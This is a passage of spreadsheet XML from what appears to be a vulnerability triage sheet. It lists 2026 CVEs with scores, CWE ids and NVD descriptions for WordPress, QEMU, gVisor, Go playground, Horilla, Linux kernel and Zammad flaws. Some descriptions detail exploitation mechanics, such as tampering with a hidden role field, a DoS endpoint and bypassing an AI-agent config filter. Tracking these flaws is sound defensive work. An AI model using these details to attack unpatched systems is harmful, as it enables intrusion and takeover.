      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>The Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 9.6.1.0. This is due to the `maybe_update_user_role()` function reading the target role directly from an attacker-controlled Gravity Forms entry field — configured via the feed's `user_role_field_id` — and passing it to `WP_User::set_role()` without validating the supplied value against an allowlist of permitted roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to administrator by tampering with the hidden role field value at form submission time. Exploitation is further enabled by the fact that $0 orders are synchronously marked as SUCCESS during form submission without requiring a real payment, and when no GF User Registration user can be resolved, the role assignment target falls back to `$lead['created_by']` — the currently authenticated submitter's own user ID — making any authenticated form submitter an eligible exploitation target.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89426</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93834</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in QEMU's 9pfs subsystem. A race condition between the main thread and a worker thread when processing concurrent Tlcreate and Twalk requests allows a malicious guest user to craft a fid path containing stale heap data, bypassing directory traversal restrictions and escaping the shared directory boundary. This can lead to arbitrary host file read/write and code execution (VM escape) as the QEMU process user.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93834</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94445</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, golang, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A malicious txtar could escape the intended execution context and force arbitrary writes to the playground host's trusted filesystem.
Disjointly, one of the three possible paths to invoke go vet on the playground host did not correctly restrict the execution environment. This permitted a Go process to make a read for an environment configuration file rooted in the playground host's $HOME.
Together, a well-crafted go env file and the go vet invocation could lead to remote code execution in the playground host itself.
This does not affect users of go.dev/play directly; however, it may affect independent deployments of golang.org/x/playground.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94445</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96795</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, HorillaListView.export_data in horilla_views/generic/cbv/views.py accepts an authenticated user's columns POST parameter, takes field_tuple[1], interpolates it into dynamic_fn_str as Python source, and passes the generated function definition to exec(). A crafted string that remains valid under ast.literal_eval can inject Python syntax into a default argument evaluated during function definition, allowing arbitrary operating-system commands to execute with the application process privileges, including root privileges in the shipped Docker image. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96795</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96812</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-668</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Improper Exposure of Resource to Wrong Sphere in the host file helper (gofer) in Google gVisor prior to commit 573a9e73cf844f on Linux platforms with CUSE enabled allows a local attacker with container image deployment privileges to achieve root code execution on the host system. By including a /dev/cuse character device node in a container image, opening the device passes through to the host, allowing the sandboxed attacker to register a host device and exploit CUSE unrestricted ioctl handling to overwrite root udev helper memory.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96812</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97527</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Serialize NVMe unsol ctx list with a per-fcport lock
The fcport-&gt;unsol_ctx_head list is modified from several contexts without
a common lock. Entries are added in qla2xxx_process_purls_iocb() from the
response queue ISR (under the qpair qp_lock), while they are removed from
qla2xxx_process_purls_pkt() (DPC/purex worker), qla_nvme_xmt_ls_rsp()
(NVMe-FC transport callback) and qla_nvme_release_lsrsp_cmd_kref() (SRB
completion). The qpair qp_lock cannot serialize this per-fcport list since
multiqueue adapters add entries through different qpairs, so a concurrent
add and delete (or two concurrent deletes) can corrupt the list pointers.
Introduce a dedicated per-fcport spinlock, unsol_ctx_lock, initialized in
qla2x00_alloc_fcport(), and take it around every list_add_tail()/list_del()
on unsol_ctx_head. The add nests under the existing qp_lock; no delete path
takes qp_lock, so the lock order is consistent and deadlock free.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97527</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97528</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Unlink NVMe unsol ctx before freeing on LS reject error
qla_nvme_xmt_ls_rsp() obtains uctx, which was linked into
fcport-&gt;unsol_ctx_head by qla2xxx_process_purls_iocb() and is still linked
when the NVMe transport calls back to transmit the LS response. On the
error (out:) path the function frees uctx with kfree() but never removes
it from the list. This leaves a freed node in fcport-&gt;unsol_ctx_head: the
next list_add_tail() for that fcport writes through the freed node, and a
subsequent list_del() can corrupt the list or panic.
Unlink uctx with list_del() before kfree() on the error path, matching the
other free sites in qla_nvme_release_lsrsp_cmd_kref() and
qla2xxx_process_purls_pkt(). qla2x00_rel_sp() in the failure path only
returns the SRB to its pool and does not invoke sp-&gt;put_fn, so the out:
path is the sole free and uctx is always still linked there.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97528</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97555</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix heap overflow in DACL owner/group rewrite
When id_mode_to_cifs_acl rewrites an existing DACL, it allocates a
buffer sized according to the on-disk DACL length reported by
dacl_ptr-&gt;size. However, replace_sids_and_copy_aces may rewrite each
ACE with a new owner/group SID obtained from the cifs.idmap upcall.
Those SIDs can have up to SID_MAX_SUB_AUTHORITIES (15) sub-authorities,
making each ACE up to 76 bytes (sizeof(struct smb_ace)).
If the original DACL contains short SIDs (e.g., 1 sub-authority) while
the replacement SIDs are long, the rewritten ACEs overflow the
allocation.
Fix this by always budgeting for worst-case SID expansion: allocate
sizeof(struct smb_acl) plus num_aces * sizeof(struct smb_ace), which
covers the smb_acl header and room for every ACE at maximum SID size.
This replaces the previous split logic that used dacl_ptr-&gt;size for
cifsacl mounts but num_aces * sizeof(struct smb_ace) for mode_from_sid
mounts: both paths can trigger the same rewrite and need the same
headroom.
KASAN reports this as:
  BUG: KASAN: slab-out-of-bounds in build_sec_desc+0x1e8a/0x2680 [cifs]
  Write of size 4 at addr ffff8881a5e25374 by task chown/5298
  ...
  The buggy address is located 0 bytes to the right of
   allocated 884-byte region [ffff8881a5e25000, ffff8881a5e25374)</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97555</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97957</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hinic: fix mailbox segment buffer overflow
check_mbox_seq_id_and_seg_len() validates that seq_id does not
exceed SEQ_ID_MAX_VAL (42) and seg_len does not exceed
MBOX_SEG_LEN (48).  However, this allows the last segment
(seq_id=42) to carry a full 48-byte payload, writing to offset
42*48=2016 for 48 bytes (ending at byte 2064).  The receive
buffer is only MBOX_MAX_BUF_SZ (2048) bytes, resulting in a
16-byte heap buffer overflow.
The hinic3 driver already handles this correctly by defining
MBOX_LAST_SEG_MAX_LEN and rejecting the last segment when it
exceeds the remaining buffer space.  Apply the same fix to the
hinic driver.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97957</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98115</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests, go</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: safely drain sessions during logoff
SMB3 multichannel allows requests for one session to run on multiple
connections. Wait for all channels bound to a session before freeing
shared session objects.
A deferred byte-range lock remains counted as a running request and only
wakes when its file closes. Wake blocked locks during the drain without
unpublishing or modifying their file objects. Synchronous CANCEL requests
must invoke their cancellation callback to wake pending operations, while
CHANGE_NOTIFY completion remains specific to the asynchronous path.
Serialize session teardown with channel registration and previous-session
cleanup, and use atomic work-state transitions so LOGOFF, CANCEL, and
connection teardown invoke cancellation callbacks only once.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98115</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56725</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An unauthenticated request to POST /api/v1/import/otrs/import_check blocks a Zammad request worker for roughly two minutes. The import_check and import_status actions are missing the setup_done_response guard that other actions in the same controller carry, so they execute on fully set-up production instances. The action enters a retry loop against a blank OTRS endpoint, sleeping for 30 s + 45 s between attempts. Impact An unauthenticated remote attacker denies service to a production Zammad instance. Each request costs almost nothing and forces ~115 seconds of server-side blocking. A few requests per second saturate the Puma worker pool. The condition persists as long as the traffic continues. No account, valid import configuration, or target knowledge beyond the hostname is needed. CSRF token is trivially obtained from any prior GET response. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56725</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56733</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, this issue concerns a lack of discursive validation within the authorization cascade. It has been determined that the system-level enforcement of access restrictions during the initialization of new identity objects exhibits a discrepancy: Under specific conditions, the granular restrictions of the access key being used are overridden by the latent authorization authority of the parent account. Consequently, this means that the intended separation of functional areas is nullified, resulting in an uncontrolled expansion of administrative discretion. Due to this potential integrity breach of the entire trust environment, an immediate evaluation of the authorization hierarchies is imperative. Impact An attacker can create new administrator accounts despite token restrictions. This grants full access to all system data (tickets, customers, configuration) and allows the attacker to take complete control of the Zammad instance. Abuse Scenario The vulnerability stems from a lack of synergy between the token-based authorization logic and the target system's functional authorization hierarchy, which allows for iterative escalation of the privileged access context. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56733</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84462</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, a security filter that protects Zammad's AI Agent configuration can be bypassed by entering specially crafted text into one of an AI Agent's fields. An administrator with permission to create or edit AI Agents could exploit this to run arbitrary commands on the server that hosts Zammad, potentially reading, modifying, or destroying all data stored on that server. No interaction from other users is needed; the malicious code runs automatically the next time the affected AI Agent processes a ticket. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84462</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100172</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
